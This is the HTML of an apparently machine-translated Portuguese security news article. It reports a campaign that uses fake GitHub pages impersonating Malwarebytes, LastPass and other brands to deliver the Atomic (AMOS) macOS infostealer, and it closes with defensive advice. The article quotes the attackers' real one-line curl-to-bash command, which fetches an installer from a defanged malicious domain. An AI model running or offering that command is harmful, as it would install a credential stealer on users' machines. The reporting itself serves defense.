Código HTML do Conteúdo
Post: Malware de armamento: o GitHub hospeda malware de malwarebytes, lastpass, Citibank, SentineLone e mais
<div>
<div>
<p>Uma campanha em larga escala direcionada aos usuários de Mac está alavancando as páginas falsas do GitHub para distribuir malware para roubar informações disfarçadas de aplicativos legítimos populares. </p>
<p>Entre os softwares personificados estão MalwareBytes para Mac, LastPass, Citibank, SentineLone e dezenas de outras marcas conhecidas. </p>
<p>Embora a representação da marca não seja novidade, esta campanha demonstra as táticas em evolução que os cibercriminosos empregam para atrair os usuários a instalar o código prejudicial.</p>
<p>Pesquisadores de ameaças da Inteligência de ameaças do LastPass e Malwarebytes têm<a href="https://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware?utm_campaign=brandsocial&utm_medium=social&utm_source=twitter" rel="noreferrer noopener nofollow" target="_blank"> identificado </a>Inúmeras páginas do Github pretendem hospedar instaladores de macos para aplicativos confiáveis. </p>
<p>Em vários casos, os invasores compram anúncios do Google patrocinados que direcionam os usuários a essas páginas maliciosas, em vez de sites oficiais de fornecedores. </p>
<p>Em outros casos, a campanha depende de técnicas de envenenamento por SEO para aumentar os repositórios falsos nos resultados de pesquisa de perguntas como “Malwarebytes Github MacOS”. Uma vez atraído para o site, os usuários involuntários recebem um “Get [APPLICATION]” botão. </p>
<p>Clicar em ele leva a instruções que baixam e executam um script do instalador de um domínio recém -registrado, geralmente sem qualquer prompt ou revisão de código do usuário, ignorando efetivamente as proteções do MacOS e a vigilância do usuário.</p>
<p>O objetivo desta operação é implantar o ladrão atômico (também conhecido como AMOS), um poderoso ladrão de informações do MacOS que colhe dados do navegador, conteúdo da área de transferência e credenciais armazenadas. </p>
<p>Se alguém clicar nesse botão, acabará em uma página de download com instruções sobre como instalar o produto falso, que é realmente um ladrão de informações.</p>
<p>Ambos os Malwarebytes para Mac e Ameakdown sinalizam e bloqueiam essa variante, mas a engenharia social inicial permanece chocantemente eficaz contra usuários menos cautelosos.</p>
<h2 id="technical-breakdown-of-the-infection-chain"><strong>Aparecimento técnico da cadeia de infecções</strong></h2>
<p>O processo de instalação se baseia inteiramente em um comando shell de linha única que os usuários são instruídos a copiar e colar em seus <a href="https://gbhackers.com/bluenoroff-macos-users/" rel="noreferrer noopener" target="_blank">macos</a> Terminal:</p>
<pre>bash<code>/bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"
</code></pre>
<p>Aqui está como funciona:</p>
<ol>
<li>O <code>curl -fsSL</code> As opções baixam silenciosamente um script remoto, seguindo todos os redirecionamentos e falhando silenciosamente nos erros HTTP.</li>
<li>Envolvendo o <code>curl</code> invocação in <code>$(…)</code> faz com que o script baixado seja passado diretamente para o exterior <code>bash -c</code> comando.</li>
<li>A invocação da concha externa executa o script buscado instantaneamente, sem apresentar seu conteúdo ao usuário para revisão.</li>
</ol>
<p>Os atacantes codificaram URLs intermediários na base64 para ofuscar o verdadeiro destino, dificultando a detecção por observadores casuais. </p>
<p>Como a abordagem do terminal não aciona as verificações de assinatura de aplicativos do MacOS ou requer instruções no nível do administrador, o script é executado com os privilégios do usuário e pode instalar agentes persistentes em Launchagents ou Launchdaemons.</p>
<h2 id="best-practices-to-avoid-fake-software"><strong>Melhores práticas para evitar software falso</strong></h2>
<p>Para proteger contra isso e táticas semelhantes, os usuários de Mac devem adotar as seguintes diretrizes:</p>
<p>Nunca execute comandos de cópia de cópia de páginas da web não verificadas, fóruns ou <a href="https://gbhackers.com/github-notifications/" rel="noreferrer noopener" target="_blank">Github</a> Repositórios. Comandos invocando <code>curl … | bash</code> ou construções semelhantes devem ser tratadas como alto risco.</p>
<p>Sempre faça o download de aplicativos do site oficial do desenvolvedor ou de uma loja de aplicativos respeitável. Em caso de dúvida, verifique os URLs do download com o fornecedor diretamente através de seus canais de suporte.</p>
<p>Desative ou tenha cuidado com os resultados de pesquisa patrocinados. Esses anúncios podem redirecionar para páginas maliciosas, mascaradas como marcas confiáveis.</p>
<p>Empregue proteção antimalware em tempo real que inclui filtragem na web. Soluções como <a href="https://gbhackers.com/malwarebytes-browser-extension/" rel="noreferrer noopener" target="_blank">MalwareBytes</a> Para Mac e Detectar e Bloquear as variantes de ladrões atômicos antes da instalação.</p>
<p>Se houver suspeita de infecção, inspecione o <code>~/Library/LaunchAgents</code> e <code>/Library/LaunchDaemons</code> Pastas para itens desconhecidos e remova quaisquer entradas suspeitas. </p>
<p>Para correção abrangente, considere um macOS completo reinstale e restaurar arquivos apenas de backups limpos conhecidos. Reinicializa todas as senhas da conta e ative a autenticação de vários fatores para evitar acesso não autorizado com credenciais roubadas.</p>
<p>Embora o GitHub seja geralmente uma plataforma confiável para o software de código aberto, esta campanha ilustra como os adversários podem armar-o, se passando por marcas legítimas. </p>
<p>A vigilância, as práticas cautelosas de download e a proteção robusta dos pontos finais continuam sendo as melhores defesas contra ameaças tão em rápida evolução.</p>
<p><strong>Siga -nos<a href="https://news.google.com/publications/CAAqKAgKIiJDQklTRXdnTWFnOEtEV2RpYUdGamEyVnljeTVqYjIwb0FBUAE?hl=en-IN&gl=IN&ceid=IN%3Aen" rel="noreferrer noopener" target="_blank">Google News</a>Assim,<a href="https://www.linkedin.com/company/cyber-threat-intel/" rel="noreferrer noopener" target="_blank">LinkedIn</a>e<a href="https://x.com/The_Cyber_News" rel="noreferrer noopener" target="_blank">X</a>Para obter atualizações instantâneas e definir GBH como uma fonte preferida em<a href="https://www.google.com/preferences/source?q=https://gbhackers.com/" rel="noreferrer noopener" target="_blank">Google</a>.</strong></p>
</div></div>